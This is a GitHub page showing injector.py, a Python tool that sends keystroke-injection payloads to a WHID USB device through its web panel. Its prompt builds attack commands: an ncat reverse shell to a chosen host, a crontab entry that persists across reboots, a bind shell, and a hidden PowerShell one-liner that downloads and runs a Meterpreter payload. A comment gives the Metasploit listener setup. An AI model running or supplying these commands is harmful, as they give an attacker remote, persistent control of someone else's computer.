-
Notifications
You must be signed in to change notification settings - Fork 1
/
injector.py
140 lines (118 loc) · 6.11 KB
/
injector.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# NOTE: python3 WHIDInjector.py -v --host 192.168.10.22 --port 4242 #reverse
import requests
import argparse
import re
from WhidInfo import *
from WhidEngine import *
from pathlib import Path
from urllib.parse import urlencode, quote_plus
if __name__ == "__main__":
# Parsing argument from command line
parser = argparse.ArgumentParser()
parser.add_argument('-v', action='store_true', dest='verbose',help='Verbosity of the output')
parser.add_argument('--force', action='store_true', dest='force', help='Force the output in french')
parser.add_argument('--host', nargs='?', default='127.0.0.1', help='Host reverse-shell' )
parser.add_argument('--port', nargs='?', default='4242', help='Port reverse-shell' )
parser.add_argument('--user', nargs='?', default='admin', help='Panel username')
parser.add_argument('--pass', nargs='?', default='hacktheplanet', help='Panel password')
parser.add_argument('--panel', nargs='?', default='http://192.168.1.1', help='Panel url')
parser.add_argument('--wifi_ssid', nargs='?', default='Exploit', help='Wifi ssid')
parser.add_argument('--wifi_pass', nargs='?', default='DotAgency', help='Wifi password')
parser.add_argument('--payload', nargs='?', default='payloads/default.txt', help='Payload template')
results = parser.parse_args()
# Default payload
payload = ""
with open(results.payload,'r') as f:
payload = f.read()
info = WhidInfo()
whid = WhidEngine(results.panel)
while(True):
user_input = input("\033[92m>>> \033[0m")
# Handling : SET xxxxxx yyyyyy
if user_input.split(" ")[0].upper() == "SET":
options = user_input.split(" ")
if options[1] == "host":
results.host = options[2]
elif options[1] == "port":
results.port = options[2]
elif options[1] == "user":
results.user = options[2]
elif options[1] == "verbose":
results.verbose = options[2].lower() == "true"
elif options[1] == "panel":
results.panel = options[2]
elif options[1] == "wifi_ssid":
results.wifi_ssid = options[2]
elif options[1] == "wifi_pass":
results.wifi_pass = options[2]
elif options[1] == "payload":
results.payload = options[2]
with open(results.payload,'r') as f:
payload = f.read()
else:
print("Unknown option - e.g: SET host 127.0.0.1")
continue
else:
# Simple user interactions
if user_input == "q" or user_input=="exit":
exit()
elif user_input == "h" or user_input == "help":
info.help()
info.help_keyboard()
info.help_commands()
continue
# Reverse Shell Linux
elif "reverse" == user_input :
user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port)
# Crontab Linux
elif "crontab" == user_input :
user_input = "bash -c '(crontab -l ; echo \"@reboot sleep 200 && ncat %s %s -e /bin/bash\")|crontab 2> /dev/null'" % (results.host, results.port)
# Bind Shell Linux
elif "bind" == user_input:
user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port)
# Meterpreter or anything for Windows
elif "meterpreter" in user_input :
"""
# Use the following to set up the listener
use exploit/multi/script/web_delivery
set SRVHOST YOUR_SERVER_IP
set SRVPORT 4646
set SSL true
set target 2
set URIPATH posh-payload
set payload windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST YOUR_SERVER_IP
set LPORT 4545
exploit -j -z
# E.g: meterpreter https://YOUR_SERVER_IP:4646/posh-payload
"""
if len(user_input.split(" ")) > 1:
msf_host = user_input.split(" ")[1]
else:
msf_host = "https://%s:%s/posh-payload" % (results.host, results.port)
user_input = "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$i=new-object net.webclient;$i.proxy=[Net.WebRequest]::GetSystemWebProxy();$i.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $i.downloadstring('%s');" % msf_host
# Send the payload
user_converted = whid.convert_to_keymap(user_input, "CustomDelay:1000\nPrint:%s\nCustomDelay:1000\nPress:176", results.force)
whid.send_payload(user_converted, results.panel+"/runlivepayload")
continue
# Send simple text without using a payload chain
elif 'send' == user_input.split(' ')[0]:
# Convert the simple text to keymap
txt = "".join(user_input.split(' ')[1:])
user_converted = whid.convert_to_keymap(txt, "CustomDelay:1000\nPrint:%s\nCustomDelay:1000\nPress:176", results.force)
if results.verbose == True:
print('\033[92mText:\033[0m\n%s' % user_converted)
# Send the payload
whid.send_payload(user_converted, results.panel+"/runlivepayload")
continue
# Send evil command with default payload
if user_input != "":
# Convert from AZERTY to QWERTY
user_converted = whid.convert_to_keymap(user_input, payload, results.force)
if results.verbose == True:
print('\033[92mPayload:\033[0m\n%s' % user_converted)
# Send the payload
whid.send_payload(user_converted, results.panel+"/runlivepayload")